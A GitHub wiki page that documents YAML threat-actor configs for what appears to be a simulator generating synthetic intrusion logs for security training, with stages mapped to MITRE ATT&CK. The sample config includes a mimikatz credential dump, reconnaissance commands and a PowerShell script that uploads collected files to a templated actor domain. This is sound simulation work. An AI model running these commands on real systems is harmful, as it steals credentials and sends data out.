-
Notifications
You must be signed in to change notification settings - Fork 0
Actor Configs
Simeon Kakpovi edited this page Sep 11, 2023
·
1 revision
The threat actor configs are modeled after the ATT&CK framework The outmost categories correspong to the categories in ATT&CK. This allows us to define which techniques an actor is able to use at every stage of the intrusion. See: https://attack.mitre.org/matrices/enterprise/
metadata:
...
reconnaissance:
...
resource_development:
...
initial_access:
...
credential_access:
...
discovery:
...
impact:
...
exfiltration:
...- Activity start and end dates should fall within the bounds of the company activity dates
-
effectivenessis currently only used to determine how likely emails are to be accepted - mal_wave_size determines the max number of email an actor may send in a "wave"
-
activity_start_hour,workday_length_hoursandactivity_start_hourtogether define the pattern of life for the actor. You should try to make this differ from the company's patter of life
metadata:
name: ELRONA
effectiveness: 99
count_init_passive_dns: 2
max_wave_size: 5
activity_start_date: "2023-06-15"
activity_end_date: "2023-11-01"
activity_start_hour: 10
workday_length_hours: 6
working_days:
- Monday
- Wednesday
- Thursday
- Friday-
recon_search_termsdetermine what terms the actor will search for on the company domains - This will appear in OutboundBrowsingEvents as
https://companydomain.com/research%20projects
recon_search_terms:
- "research projects"
- "proprietary data"
- "academic collaborations"
- "research team"
- "confidential reports"
- "data analysis"- This category defines how the actor will acquire infrastructure used in operators (e.g. domains, email address, email subjects, email attachment filenames)
- Domains are generated arbitrarily based on the list of provided domain themes. The
domain_depthdetermines how many themed words will be used to generate the final domains.- So...
domain_depth: 1->science.site - but
domain_depth: 2->science-vaccine.site
- So...
-
tldsdetermine the top-level domains used by the actor. You maybe include as many as you want. They don't have to be real. - Malware refers to the malware that can be used by the actor. You may include multiple, but they must exist in the malware configs.
- E.g. if you include
frp-> there must be a file calledfrp.yamlin the malware folder
- E.g. if you include
resource_development:
domain_depth: 2
domain_themes:
- science
- discovery
- academia
- vaccine
- covid
- cure
tlds:
- site
- xyz
file_names:
- "ResearchReport.pdf"
- "ConfidentialFindings.docx"
- "DataAnalysisResults.xlsx"
- "ProjectPresentation.ppt"
malware:
- frpSee: actions
Here, we generally want to run some commands that correspond to the credential access phase.
Important: Using the dump_credentials command allows the actor to actually capture cached credentials and use them to move laterally.
credential_access:
- run_process_commands:
- process: mimikatz.exe "sekurlsa::logonpasswords"
- dump_credentials
- create_files:
- path: C:\\Windows\\Temp\\mimikatz_output.txtRun a series of actions an actor might take to learn more about a newly compromised hosts This will only happen once after an actor compromises a machine
See actions for more
Run actions an actor might use to ransom the org
See actions for more
Run actions an actor might use to exfiltrate the org
See actions for more
Domain Controller Commands: Commands the actor runs on all domain joined hosts in the environment after compromising the domain controller
domain_controller_commands: #persistence
- process: "nltest /dsgetdc:domain.local"
- process: "dsquery server -domain domain.local"Final Target Roles: Roles of employees the actor will run impact and exfiltration actions on. Use this for targeted campaigns. Ignore to take action indiscriminately.
final_target_roles:
- Lead Researcher
- Chief Scientistmetadata:
name: ELRONA
effectiveness: 99
count_init_passive_dns: 2
max_wave_size: 5
activity_start_date: "2023-06-15"
activity_end_date: "2023-11-01"
activity_start_hour: 10
workday_length_hours: 6
working_days:
- Monday
- Wednesday
- Thursday
- Friday
reconnaissance:
recon_search_terms:
- "research projects"
- "proprietary data"
- "academic collaborations"
- "research team"
- "confidential reports"
- "data analysis"
resource_development:
domain_depth: 2
domain_themes:
- science
- discovery
- academia
- vaccine
- covid
- cure
tlds:
- site
file_names:
- "ResearchReport.pdf"
- "ConfidentialFindings.docx"
- "DataAnalysisResults.xlsx"
- "ProjectPresentation.ppt"
malware:
- frp
initial_access:
attacks:
- recon:browsing
- watering_hole:malware_delivery
watering_hole_domains:
- wesellbeakers.online
credential_access:
- run_process_commands:
- process: mimikatz.exe "sekurlsa::logonpasswords"
- dump_credentials
- create_files:
- path: C:\\Windows\\Temp\\mimikatz_output.txt
discovery:
- run_process_commands:
- process: systeminfo
- process: netstat -ano
- process: tasklist
domain_controller_commands: #persistence
- process: "nltest /dsgetdc:domain.local"
- process: "dsquery server -domain domain.local"
impact:
- create_files:
- path: "C:\\Users\\Public\\Documents\\ResearchExfil\\RESEARCH_DATA_{{username}}.zip"
- run_process_commands:
- name: powershell.exe
process: |
$sourcePath = 'C:\Users\Public\Documents\ResearchExfil\' # Source folder
$destinationURL = 'http://{{actor_domain}}/exfil/' # Destination URL
# Get all files recursively in the source directory
$files = Get-ChildItem -Path $sourcePath -File -Recurse
# Iterate through each file and send to the external location
foreach ($file in $files) {
$filePath = $file.FullName
$destination = $destinationURL + $file.Name
# Use Invoke-RestMethod to send the file via HTTP POST
Invoke-RestMethod -Uri $destination -Method Post -InFile $filePath
}
obfuscation:
- base64
final_target_roles:
- Lead Researcher
- Chief Scientist